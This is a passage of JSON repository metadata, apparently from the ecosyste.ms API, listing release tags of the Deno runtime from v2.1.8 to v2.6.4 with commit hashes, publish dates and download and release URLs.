:"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.